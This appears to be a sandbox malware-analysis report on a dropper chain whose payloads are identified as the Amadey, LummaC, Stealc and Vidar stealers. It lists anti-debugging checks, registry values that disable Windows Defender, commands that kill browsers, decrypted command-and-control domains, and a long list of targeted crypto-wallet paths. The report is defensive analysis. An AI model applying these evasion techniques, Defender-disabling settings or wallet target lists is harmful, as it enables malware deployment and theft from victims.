Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_053708D0 rdtsc

0_2_053708D0

Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe

Code function: 7_2_00B1638A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00B1638A

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F652B mov eax, dword ptr fs:[00000030h]	0_2_008F652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FA302 mov eax, dword ptr fs:[00000030h]	0_2_008FA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B5A302 mov eax, dword ptr fs:[00000030h]	2_2_00B5A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B5652B mov eax, dword ptr fs:[00000030h]	2_2_00B5652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B5A302 mov eax, dword ptr fs:[00000030h]	3_2_00B5A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B5652B mov eax, dword ptr fs:[00000030h]	3_2_00B5652B
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6D3E0 mov edi, dword ptr fs:[00000030h]	7_2_00A6D3E0

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B1638A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00B1638A
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B11487 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00B11487
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B11514 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00B11514

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 7fb3e2a1d2.exe PID: 2472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3e169c0a7e.exe PID: 1120, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe

Memory written: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: pisos23.exe, 00000007.00000002.2928355498.00000000033C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: reinfomarbke.site
Source: pisos23.exe, 00000007.00000002.2928355498.00000000033C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: monopuncdz.site
Source: pisos23.exe, 00000007.00000002.2928355498.00000000033C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: unityshootsz.site
Source: pisos23.exe, 00000007.00000002.2928355498.00000000033C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: moeventmynz.site
Source: pisos23.exe, 00000007.00000002.2928355498.00000000033C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: plaintifuf.site
Source: pisos23.exe, 00000007.00000002.2928355498.00000000033C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: honerstyzu.site
Source: pisos23.exe, 00000007.00000002.2928355498.00000000033C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: bringlanejk.site
Source: pisos23.exe, 00000007.00000002.2928355498.00000000033C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: uppermixturyz.site
Source: pisos23.exe, 00000007.00000002.2928355498.00000000033C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: terracedjz.cyou
Source: 3e169c0a7e.exe, 00000009.00000003.2856886211.00000000048B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: scriptyprefej.store
Source: 3e169c0a7e.exe, 00000009.00000003.2856886211.00000000048B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: navygenerayk.store
Source: 3e169c0a7e.exe, 00000009.00000003.2856886211.00000000048B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: founpiuer.store
Source: 3e169c0a7e.exe, 00000009.00000003.2856886211.00000000048B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacedmny.store
Source: 3e169c0a7e.exe, 00000009.00000003.2856886211.00000000048B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: thumbystriw.store
Source: 3e169c0a7e.exe, 00000009.00000003.2856886211.00000000048B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fadehairucw.store
Source: 3e169c0a7e.exe, 00000009.00000003.2856886211.00000000048B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crisiwarny.store
Source: 3e169c0a7e.exe, 00000009.00000003.2856886211.00000000048B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: presticitpo.store

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe "C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe "C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe "C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe "C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe "C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Process created: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe "C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: da069a4b00.exe, 00000010.00000002.3079676854.0000000000D82000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3552801155.0000000000F7F000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Program Manager
Source: firefox.exe, 0000001D.00000002.3169576882.000000663423B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWi

Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe

Code function: 7_2_00B11686 cpuid

7_2_00B11686

Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Queries volume information: unknown VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008DCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_008DCBEA

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: 3e169c0a7e.exe, 3e169c0a7e.exe, 00000009.00000003.3164057565.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.3029459573.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3018286235.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3018208886.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3018286235.000000000349C000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3019149361.000000000349C000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3018473788.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3234771882.00000000013ED000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 3.2.skotes.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.8c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match	File source: 00000010.00000003.3077740668.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: da069a4b00.exe PID: 5844, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3e169c0a7e.exe PID: 7892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pisos23.exe PID: 8072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3e169c0a7e.exe PID: 1120, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3540303643.0000000000B11000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3556235147.000000000160E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2960979403.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3110291684.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3420827049.00000000087E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7fb3e2a1d2.exe PID: 2472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3e169c0a7e.exe PID: 1120, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 7fb3e2a1d2.exe PID: 2472, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 3e169c0a7e.exe, 00000009.00000003.2890126732.0000000000D96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: pisos23.exe, 0000000A.00000003.2960102446.000000000349B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 3e169c0a7e.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
